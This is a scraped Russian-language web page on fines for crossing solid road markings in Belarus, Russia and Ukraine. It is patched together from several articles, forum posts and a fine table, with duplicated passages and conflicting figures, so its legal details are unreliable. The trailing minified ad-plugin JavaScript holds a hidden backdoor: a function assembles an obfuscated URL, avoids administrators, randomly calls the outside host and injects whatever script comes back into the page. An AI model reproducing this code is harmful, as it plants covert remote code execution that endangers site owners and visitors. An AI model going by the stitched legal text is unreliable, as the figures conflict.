Пересечение сплошной линии по пдд рб

Штрафные санкции за пересечение одинарной и двойной сплошной полосы

  • Штрафные санкции за пересечение одинарной и двойной сплошной полосы
  • 1. Одинарная и двойная сплошные полосы
  • 2. Размеры штрафных санкций за переезд через сплошную полосу
  • 2.1. В России
  • 2.2. В Украине
  • 2.3. В Республике Беларусь
  • 3. Наиболее частые ситуации
  • 3.1. Начало обгона через прерывистую, окончание его через сплошную
  • 3.2. Разворот через двойную сплошную полосу
  • 3.3. Пересечение сплошной полосы для объезда препятствия

Существует несколько правил касательно того, разрешается ли пересечение одинарной или двойной сплошной полосы. Некоторые из них водители соблюдают, а о некоторых, возможно, и не догадываются, за что и получают штрафы. Данная статья расскажет вам, для чего нужны этих две разновидности сплошной полосы, какие штрафы можно схлопотать за их пересечение и много других нюансов.

1. Одинарная и двойная сплошные полосы

Как правило, одинарная, а также двойная сплошная линии предназначаются для того, чтобы разделять транспортные потоки, направленные в противоположные стороны. Разница между этими двумя линиями состоит в том, что двойную сплошную принято применять исключительно на проезжих частях, которые имеют четыре и больше полос движения. Одинарная линия, в свою очередь, может быть обозначающим знаком границ полос автомобильного движения в аварийных участках проезжей части, границы дороги, на которые заезжать категорически воспрещено, а также может служить указанием границ стоянки транспортных средств.

2. Размеры штрафных санкций за переезд через сплошную полосу

На сегодняшний день имеется некоторый список обстоятельств, при которых автомобилист ни в коем случае не должен пересекать сплошную линию разметки. Вот перечень данных обстоятельств:

1. Если автомобиль передвигается по дороге, которая предназначена для движения в обе стороны, а также когда проезжая часть имеет больше четырех полос, а встречные потоки автомобильного транспорта разделены двойной сплошной линией.

2. Если автомобиль передвигается по проезжей части, которая имеет движение в обе стороны, и дорожное покрытие имеет три полосы (полосу, которая находится посредине, принято использовать автомобильными транспортами для передвижения в обоих направлениях). В данной ситуации, въезд на крайнюю левую полосу строго запрещен.

3. Если автомобиль передвигается по перекрестку с круговым движением или который регулируется; на дорожном участке в конце подъема, а также на участках, которые характеризируются пониженной видимостью.

Исходя из вышеперечисленного, пересечение сплошной линии фактически является выездом автомобильного транспорта на полосу встречного автомобильного потока. И совсем не важно, является ли эта линия двойной или одинарной – правонарушение, в любом случае, имеет место быть. В порядке исключения рассматриваются сплошные линии, которые принято наносить для того, чтобы выделить место стоянки.

Как правило, за любое нарушение правил дорожного движения полагается наложение штрафа. Давайте рассмотрим, какая сумма штрафа устанавливается за пересечение одинарной и двойной сплошной полосы в некоторых странах.

2.1. В России

Если говорить о Российской Федерации, размер штрафа за переезд через сплошную полосу зафиксирован в КоАП РФ, а именно в Части 4 статьи 12.15 вышеуказанного кодекса, и составляет около 5000 рублей. Также за такое правонарушение автомобилист может лишиться водительских прав на период до шести полных месяцев.

В части 2 статьи 12.16 КоАП имеется также описание похожей ситуации, когда сплошная полоса дорожной разметки пересекается в момент выполнения поворота в левую сторону или же разворота. Размер штрафа, который выписывается за разворот через сплошную полосу, в согласии с данной нормой предусматривает сумму от тысячи до полторы тысячи рублей.

2.2. В Украине

В Украине за переезд через одинарную и двойную сплошную полосу можно влететь на сумму от 255 до 340 гривен: все зависит от ситуации, при которой было сделано нарушение.

2.3. В Республике Беларусь

Если говорить о Республике Беларусь, установление штрафов за невыполнение требований каких-либо сигналов, которые производят регулировку дорожного движения, а также несоблюдение правил пассажироперевозки или других правил дорожного движения берет на себя Статья 18.14 КоАП РБ, а именно часть 6, в которой говорится о невыполнении автомобилистом всех требований, предоставленных дорожными знаками или же разметками, что равно пересечению сплошной линии. Итак, в Беларуси размер штрафа за несоблюдение данных правил составляет от одной до пяти базовых величин.

3. Наиболее частые ситуации

3.1. Начало обгона через прерывистую, окончание его через сплошную

Бывают такие случаи, когда автомобилист пересекает сплошную линию именно в тот момент, когда завершает обгон (маневр начинается там, где между полосами нанесена прерывистая полоса, а заканчивается там, где она уже переходит в сплошную). В этом случае автомобилисту следует рассматривать п.11.4 ПДД, в котором говорится, что автомобилисту, который заканчивает обгон, необходимо вернуться снова на свою полосу. Правила дорожного движения в данном случае не рассматривают род разметки, которая нанесена на соответствующий участок дорожного покрытия.

В данной ситуации, как подчеркивают правила, автомобилист просто вынужден пересечь разделительную линию, так как движение автомобиля по линии со встречным автомобильным потоком категорически воспрещается законом. Хотя для того, чтобы не схлопотать штраф и оказаться невиновным, необходимо еще и предоставить дорожному инспектору доказательства о том, что обгонять вы начали еще до начала сплошной линии.

3.2. Разворот через двойную сплошную полосу

Как показывает практика, бывают и такие ситуации, при которых условия передвижения автомобильного транспорта могут привести к несоблюдению дорожных правил. К примеру, большинству водителей приходилось пересекать сплошную разметку, дабы предотвратить аварию и спасти свою жизнь или жизнь пешехода. В данном случае правонарушение расценивается как незаконные действия других участников дорожного движения, а не водителя, который, в данном случае, совершил пересечение.

В данных ситуациях, дорожный патруль, который прибыл на место возникновения ДТП, должен осуществить подробный опрос всех лиц, которые приняли участие в аварии, а также свидетелей, которые наблюдали за ней со стороны. Все это делается для точной установки обстоятельств дела. Если в итоге виновность нарушителя не была доказана, он полностью освобождается от ответственности.

Довольно важным признаком того, что сделанный неправомерный поступок может оправдаться крайней необходимостью, в административном праве является размер, а также характер вреда, которые были причинены данным нарушением. Таким образом, ущерб, который был нанесен в результате действий автомобилиста в рамках крайней необходимости, должен быть менее значительным по отношению к ущербу, предотвращенному данным нарушением.

Так, к примеру, полностью оправданным может быть разворот через двойную сплошную линию после автомобильного происшествия, когда возможности ждать скорую просто нет, а пострадавшего необходимо срочно доставить в больницу. В данном случае, автомобилист также не будет нести ответственность за то, что он покинул место происшествия.

3.3. Пересечение сплошной полосы для объезда препятствия

В силу загруженности дорог, большинство автомобилистов не раз попадали в такие ситуации, когда попутная сторона проезжей части по тем или иным причинам оказывалась перекрыта. Причин, по которым проезжая часть может быть заблокирована, бывает множество, будь это неожиданно возникшее ДТП, или же некорректно остановившийся на остановке общественного транспорта автобус или троллейбус.

В такой ситуации автомобилист стоит перед сложным выбором: он может спокойно дождаться полного освобождения проезжей части или же осуществить объезд препятствия, двигаясь по встречной полосе. Как показывает практика, не каждый сможет корректно отличить объезд от обгона. Исходя из этого, самые расторопные автомобилисты и попадают в руки дорожной инспекции и лишаются водительских прав.

Закон в данном случае гласит, что объезд препятствия через сплошную линию разметки в любой ситуации является грубым нарушением ПДД. Он несет за собой три типа административного взыскания:

1. Простое предупреждение или же наложение административного штрафа в размере пятисот рублей, если правонарушитель осуществил объезд без непосредственного выезда на «встречку». При этом совсем не интересует, что именно вы объезжаете: препятствие или остановившийся автобус.

2. Штраф, сумма которого варьируется от тысячи до полторы тысячи рублей, грозит при объезде препятствия, если автомобилист совершил пересечение сплошной полосы разметки, которая разделяет транспортные потоки противоположных направлений. К примеру, данный штраф может быть выписан при объезде аварии на проезжей части с двумя полосами, в центре которой изображена сплошная линия разметки.

3. Лишение прав на срок от четырех до шести полных месяцев в том случае, если автомобилист осуществит объезд, к примеру, автобуса на остановке, в период которого будет пересечена сплошная полоса разметки, и автомобиль выедет на встречную полосу.

В итоге, можно сказать, что внимательность на дороге является одним из наиболее важных факторов не только вашей безопасности, но и вашего финансового благополучия. Как ни прискорбно, правонарушения, которые относятся к пересечению одинарных или же двойных сплошных полос, случаются наиболее часто среди автомобилистов, поэтому эта тема остается крайне актуальной.

Подписывайтесь на наши ленты в таких социальных сетях как, Facebook, Вконтакте, Instagram, Pinterest, Yandex Zen, Twitter и Telegram: все самые интересные автомобильные события собранные в одном месте.

Таблица штрафов за нарушения ПДД Республики Беларусь

Административная ответственность за правонарушения против безопасности движения и эксплуатации транспорта Республики Беларусь.

В редакции Кодекса Республики Беларусь об административных правонарушениях, действующей с 8 января 2018 года.

Суммы штрафов рассчитываются исходя из размера базовой величины. Размер базовой величины с 1 января 2019 года установлен в 25.50 белорусских рубля (773 RUB).

Ниже можно выбрать валюту, в которой будут отображаться суммы штрафов, указанные в скобках под основной валютой.

Под транспортным средством, указанным в статьях 18.9, 18.12–18.22, 18.24–18.26 настоящего Кодекса, понимаются механическое транспортное средство, прицеп к нему, предназначенные для движения по дороге и для перевозки пассажиров, грузов или установленного на них оборудования, а также шасси транспортного средства и самоходная машина.

25.50 – 76.50 бел.руб. (RUB 773 – 2,318)

25.50 бел.руб. (RUB 773)

25.50 бел.руб. (RUB 773)

25.50 – 76.50 бел.руб. (RUB 773 – 2,318)

51 бел.руб. (RUB 1,545)

Регистрационный знак транспортного средства признается нестандартным при несоответствии его обязательным для соблюдения требованиям технических нормативных правовых актов в области технического нормирования и стандартизации. Исполнение регистрационных знаков должно обеспечивать их прочтение днем в ясную погоду с расстояния не менее 40 метров.

25.50 бел.руб. (RUB 773)

127.50 – 382.50 бел.руб. (RUB 3,864 – 11,591)

или лишение права управления ТС сроком
до 1 года

25.50 – 127.50 бел.руб. (RUB 773 – 3,864)

76.50 бел.руб. (RUB 2,318)

51 бел.руб. (RUB 1,545)

51 бел.руб. (RUB 1,545)

102 бел.руб. (RUB 3,091)

25.50 – 127.50 бел.руб. (RUB 773 – 3,864)

25.50 – 127.50 бел.руб. (RUB 773 – 3,864)

51 – 255 бел.руб. (RUB 1,545 – 7,727)

с лишением права управления ТС сроком
до 1 года

или без лишения

51 – 255 бел.руб. (RUB 1,545 – 7,727)

с лишением права управления ТС сроком
до 1 года

или без лишения

127.50 – 255 бел.руб. (RUB 3,864 – 7,727)

с лишением права управления ТС сроком
до 6 месяцев

или без лишения

127.50 – 510 бел.руб. (RUB 3,864 – 15,455)

с лишением права управления ТС сроком
до 2 лет

или без лишения

Под созданием аварийной обстановки в настоящей статье и статье 18.23 настоящего Кодекса понимаются действия участников дорожного движения, вынудившие других его участников изменять скорость, направление движения или принимать иные меры по обеспечению собственной безопасности или безопасности других лиц.

1,275 – 2,550 бел.руб. (RUB 38,636 – 77,273)

с лишением права управления ТС сроком
на 3 года

1,275 – 2,550 бел.руб. (RUB 38,636 – 77,273)

с лишением права управления ТС сроком
на 3 года

51 – 765 бел.руб. (RUB 1,545 – 23,182)

или лишение права управления ТС сроком
до 2 лет

127.50 – 637.50 бел.руб. (RUB 3,864 – 19,318)

или лишение права управления ТС сроком
до 2 лет

510 – 1,275 бел.руб. (RUB 15,455 – 38,636)

или административный арест до 15 суток

76.50 – 127.50 бел.руб. (RUB 2,318 – 3,864)

ИП или юридическое лицо: 255 – 382.50 бел.руб. (RUB 7,727 – 11,591)

127.50 – 255 бел.руб. (RUB 3,864 – 7,727)

ИП или юридическое лицо: 382.50 – 637.50 бел.руб. (RUB 11,591 – 19,318)

76.50 – 255 бел.руб. (RUB 2,318 – 7,727)

или лишение права управления ТС сроком
до 6 месяцев

127.50 – 510 бел.руб. (RUB 3,864 – 15,455)

с лишением права управления ТС сроком
до 2 лет

или без лишения

1. Требование сотрудника органов внутренних дел об остановке транспортного средства должно соответствовать правилам дорожного движения.

2. Под преследованием в части 3 настоящей статьи понимается преследование сотрудниками органов внутренних дел на транспортном средстве оперативного назначения с включенными проблесковыми сигналами (маячками) синего или синего и красного цветов лица, управляющего транспортным средством, не выполнившего заведомо очевидные для него законные неоднократные требования сотрудника органов внутренних дел об остановке транспортного средства. При этом с использованием специального звукового сигнала осуществляется информирование участников дорожного движения о необходимости повышения внимательности и соблюдения мер предосторожности.

Объезд «лежачего полицейского» по встречной – это «двойная сплошная»

«Добрый день. Я живу на ул. Шпилевского в Минске, на проезжей части этой улицы есть «лежачий полицейский», разделенный пополам: одна его половина на одной части дороги, вторая – на другой через несколько метров. Каждый десятый водитель, не притормаживая, объезжает свою половину искусственной неровности по полосе встречного движения, так как поток машин небольшой. Разметка сейчас кое-где поистерлась, на отрезке между «лежачим полицейским» и пешеходной «зеброй» ее иногда вообще нет. Хотелось бы знать, какой пункт Правил нарушают водители и что им за это полагается?»

Как рассказали abw.by в ГАИ, объезжая искусственную неровность по полосе встречного движения, водители нарушают п.7.1.4 Правил дорожного движения, который гласит о том, что участники дорожного движения обязаны знать и соблюдать относящиеся к ним требования настоящих Правил и руководствоваться горизонтальной и вертикальной дорожной разметкой согласно Приложению 3 к настоящим Правилам. Предполагается, что в месте пересечения «лежачего полицейского» на проезжей части имеется разметка 1.3 – двойная сплошная линия, пересекать которую категорически запрещено. Именно за пересечение «двойной сплошной» ГАИ и штрафует водителей в таких случаях, причем не важно, выехал автомобиль на полосу встречного движения полностью или же только колесами одной сторон ы .

Ответственность за нарушение данного пункта Правил предусмотрена ст.18.14.8 КоАП РБ: » Нарушение лицом, управляющим транспортным средством, правил обгона либо выезд на полосу встречного движения в случаях, когда это запрещено правилами дорожного движения, влекут наложение штрафа в размере от 2 до 10 базовых величин с лишением права управления транспортными средствами сроком до одного года или без лишения».

Пересечение сплошной линии разметки в рб

Сколько штраф за пересечение разметки сплошной линии в 2018 году

  • краски должны отвечать требованиям государственного стандарта;
  • дорога должна быть сухой и чистой;
  • если используется пластик, полотно необходимо обработать специальным грунтовым составом;
  • наносить разметку нужно, начиная с осевой линии;
  • краску необходимо встряхнуть, чтоб она стала однородной.

В случае признания нарушителем своей вины Постановление оформляется на месте, протокол не составляется При отрицании вины (или за рулем находился не владелец автомобиля) Оформляется протокол, иногда разбирательство продолжается в инспекции Если наказание Штраф, оформление протокола обязательно. Документы передают в суд

Пересечение сплошной линии разметки в рб

  1. Самое частое нарушение – это обгон по встречной полосе. Эта ситуация прописана в 4 части статьи 12.15 КоАП. За это нарушение водителя могут лишить прав на срок от 4 месяцев до 6. При этом для суда не имеет значение, обгонял ли при этом водитель трактор, который плетется со скоростью 20 км/ч или же мчался по «встречке» наперегонки с другим водителем. Конечно, вина тракториста в том, что он не съехал на обочину, уступив дорогу, хотя это требование, прописано в правилах. Но его вина не спасет от лишения прав того водителя, кто выехал на «встречку».
  2. Вторая ситуация также квалифицируется по части 4 ст. 12.15. Поворачивая налево, водители зачастую не доезжают до прерывистой разметки. Таким образом, им хочется быстрее проскочить на зеленый сигнал светофора, сэкономив метр-другой до линии разрыва. Тем самым автолюбитель создает опасную ситуацию, ведь из поворота может «вынырнуть» другой автомобиль. В этом случае у водителя также изымут права.

1. Простое предупреждение или же наложение административного штрафа в размере пятисот рублей, если правонарушитель осуществил объезд без непосредственного выезда на «встречку». При этом совсем не интересует, что именно вы объезжаете: препятствие или остановившийся автобус.

Штрафы за нарушение сплошной линии разметки

Владимир (13.09.2012 20:33:32)
Я был лишен прав гаишниками за обгон по встречной полосе.Дело было за городом,я двигался в веренице автомобилей которые ехали со скоростью около 60км/час.проехав несколько км с такой скоростью я принял решение обогнать их.Убедившись что встречная полоса свободна, а разделительная линия прерывистая я перестроился на встречную полосу движения и увеличил скорость обогнав 2-а автомобиля и уже приблизившись к третьему вдруг вижу,что прерывистая разделительная линия стала переходить в сплошную.И я принял решение чтобы не создать аварийной ситуации увеличить скорость обогнать в переди идущие 2-е машины и занять свое место в колоне сзади движущихся машин.Потом как выяснилось эту колону возглавляли инспекторы ГИБДД.Видимо сзади едущие машины не рисковали обогнать инспекторов.Хочу заметить что объгон начинал по прерывистой и заканчивал тоже на прерывистой.Участок сплошной линии был очень маленьким около 30метров.

Дмитрий (04.10.2012 14:52:40)
Выехал на полосу маршрутного транспорта,штраф 3000р,в других районах 1500р.Вопрос вот в чём: а не нарушаются ли мои права как Гражданина РФ по конституции РФ,а именно Главы 2 ст.19 п.1 и 2?Где сказано,что перед законом все равны в независимости от места проживания.А вот в штрафах Москва и Санкт-Петербург оказывается не равны по конституции.Или я не прав?Возможно-ли через суд отменить это решение?

Штрафные санкции за пересечение одинарной и двойной сплошной полосы

Бывают такие случаи, когда автомобилист пересекает сплошную линию именно в тот момент, когда завершает обгон (маневр начинается там, где между полосами нанесена прерывистая полоса, а заканчивается там, где она уже переходит в сплошную). В этом случае автомобилисту следует рассматривать п.11.4 ПДД, в котором говорится, что автомобилисту, который заканчивает обгон, необходимо вернуться снова на свою полосу. Правила дорожного движения в данном случае не рассматривают род разметки, которая нанесена на соответствующий участок дорожного покрытия.

Законом установлено, что пересечение сплошных линий разметки (то бишь, фактически выезд на встречную полосу) является серьезным правонарушением ПДД и влечет за собой лишение водителя права управления автомобильным транспортом на период от четырех до шести полных месяцев.

Пересечение двойной сплошной

Пока в обоих случаях я склоняюсь к (причем случай №1 притянут за уши):
Статья 18.14.6. Невыполнение лицом, управляющим транспортным средством, требований дорожных знаков или разметки (за исключением выезда на полосу встречного движения) либо нарушение правил расположения транспортных средств на проезжей части, а равно непредоставление лицом, управляющим транспортным средством, преимущества в движении маршрутному транспортному средству, пешеходам, иным участникам дорожного движения предупреждение или штраф в размере от 1 до 5 б.в.

Здрастуйте, подскажите пожалуста, какое наказание грозит по обоим случаям:
Ситуация: Т-образный перекресток — выезд со двора на дорогу с двусторонним движением имеющую 4 полосы, разделенные двойной сплошной линией.
1. выезжая со двора отсутствует знак «движение только направо» поворачиваю налево пересекая двойную сплошную

Чем грозит пересечение сплошной линии разметки

Обе описанные ситуации, несомненно, попадают под часть 4 статьи 12.15 КоАП, и влекут за собой неприятные последствия в виде лишения водительских прав сроком от 4 месяцев до полугода либо штраф в 5000 рублей, в случае видеофиксации совершенного нарушения.

  • Одинарная линия 1.1 разграничивает транспортные потоки, движущиеся в противоположных направлениях, устанавливает пределы движения внутри полос на особо опасных отрезках дороги. Также с помощью данной разметки обозначаются стояночные места в зоне парковки.
  • Одинарная линия 1.2.1 обозначает правый край проезжей части.
  • Двойная линия 1.3 разделяет встречные потоки на четырех и более полосных дорогах.

Пересечение сплошной линии — штраф

  • при движении по трассе со встречным движением и количеством полос, превышающим 4 шт.;
  • в результате движения авто по дороге с тремя полосами движения заступ за левую сплошную полосу карается по закону;
  • при движении в условиях городских дорог, плохой видимости и т.д.

Пересечение сплошной линии некоторые водители осуществляют по невнимательности и халатности. Существует часть владельцев авто, которые идут на правонарушение осознанно, например, с целью избежать столкновения и травм. Отступление от ПДД может спасти жизни людей и снизить вред от аварии. Водитель может избежать штрафа, если найдутся свидетели, подтверждающие, что действия водителя были вынужденными.

Штраф за наезд на сплошную линию разметки

  1. Одинарная – эта линия разделяет движение автомобилей, движущихся в противоположных направлениях.
  2. Двойная – эта линия тоже разделяет движение встречных транспортных средств. Ее отличие в том, что количество полос движения больше двух в каждом направлении.
  3. Постоянная – линия белого или желтого цвета.
  4. Временная – линия оранжевого цвета. Она наносится только на время проведения на дороге ремонтных работ.
  1. Он должен доказать инспектору ГИБДД, что пересечение сплошной линии разметки было намеренным и связано с тем, чтобы не допустить появления аварийной ситуации, столкновения с идущим пешеходом.
  2. Разметочная линия стертая, ее трудно различить или она вообще не видна (например, в дождливую, заснеженную погоду).
  3. Дорожная разметка пропадает в отдельных местах.

Пересечение сплошной линии разметки: последствия для водителя

Второй вариант – нарушение правил поворота и разворот в неположенном месте. Штраф за нарушение сплошной в этом случае составит 1-1,5 тысячи рублей. Лишение прав в этом случае вообще не предусмотрено, поэтому если нарушителя начинают пугать такой мерой и требовать взятку, он может сам подать на правоохранителей в суд.

Каждый водитель должен помнить, что «правила дорожного движения написаны кровью»: каждое ограничение появилось не просто так, и сплошная линия отделяет опасные участки. Нарушение правил приводит к столкновениям, которые угрожают не только автомобилям, но людям. Если не соблюдать правила обгона, можно подставить под удар сразу несколько транспортных средств.

Штраф или лишение грозит за пересечение сплошной линии разметки в 2016 году

Через сплошную линию 1.2.1 разрешено сворачивать на обочину для остановки/стоянки и с обочины на проезжую часть в начале движения. Отдельной статьи в КоАП, которая бы определяла наказание за незаконный проезд по краевой разметке, нет. Водителя, пересекшего эту черту для объезда пробки, накажут за движение по обочине по п. 1. ст. 12.15 (в 2019 г. — штраф 1,5 тыс. руб.).

Одинарная сплошная разметка может разделять и ряды попутного направления. За ее пересечение водителя накажут по п. 1. ст. 12.16 (в 2019 г. — штраф 500 руб. или предупреждение). Перестроение в крайний правый ряд через линию 1.1 обойдется автомобилисту дороже, если при этом он выехал на полосу для общественного транспорта, обозначенную разметкой 1.23.1 или знаком 5.14 (п. 1.1 ст. 12.17 КоАП РФ в 2019 г. предусматривает штраф 1,5 тыс. руб.).

Белорусский форум

4. Нарушение лицом, управляющим транспортным средством (за исключением водителей транспортных средств оперативного назначения), правил пользования радио- и телефонной связью во время движения – влечет предупреждение или наложение штрафа в размере до двух базовых величин.

3. Нарушение лицом, управляющим транспортным средством, правил движения по автомагистрали, пользования внешними световыми приборами, буксировки транспортных средств, а равно нарушение правил применения аварийной сигнализации и знака аварийной остановки – влекут предупреждение или наложение штрафа в размере до двух базовых величин.

Какое наказание за пересечение сплошной линии в 2018 году

В обоих случаях водителю грозят финансовые взыскания, сумма которых достигнет максимально возможного значения – 5000 рублей, или лишение прав: это решает сотрудник дорожной полиции. При повторном совершении того же правонарушения можно лишиться права на управление автомобилем на год.

Многих водителей интересует, что будет за пересечение сплошной линии разметки справа у обочины и предусмотрен ли за это штраф согласно статье КоАП в 2018 году. Этот вопрос вызывает массу споров на форумах и в реальной жизни среди автолюбителей. В принципе, правила запрещают пересекать данную линию, но есть исключения из правил, к которым относятся:

В Беларуси могут ввести фотофиксацию проезда на красный и пересечения двойной сплошной

В настоящее время камеры фиксируют только нарушения скоростного режима и правил остановки/стоянки.

Напомним, штраф за невыполнение указаний светофора или регулировщика в Беларуси составляет от 1 до 5 базовых величин (от 25,5 до 127,5 рублей), или предупреждение. Такой же штраф предусмотрен за невыполнение требований дорожных знаков или разметки. За нарушение правил проезда железнодорожного переезда штраф составит от 2 до 4 базовых величин – от 51 до 102 рублей.

Парламентарий напомнил, что законопроект о дорожном движении содержит и другие новации, в их числе система начисления баллов за нарушения ПДД.

Кроме того, предлагается предоставить кандидатам в водители право сдавать экзамен в ГАИ на машине с автоматической коробкой передач после прохождения соответствующей подготовки. Права в этом случае будут выдаваться с отметкой о необходимости управления транспортным средством соответствующей категории только с автоматической трансмиссией. Сдавшие же экзамен на автомобиле с механической трансмиссией смогут управлять любыми машинами.

Госавтоинспекция также инициировала вопрос о выдаче международных водительских удостоверений. Кроме того, целая глава законопроекта посвящена вопросам организации дорожного движения. По словам Андрея Рыбака, законопроект, предусматривающий изменения в закон «О дорожном движении», возможно, будет рассмотрен на весенней сессии.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
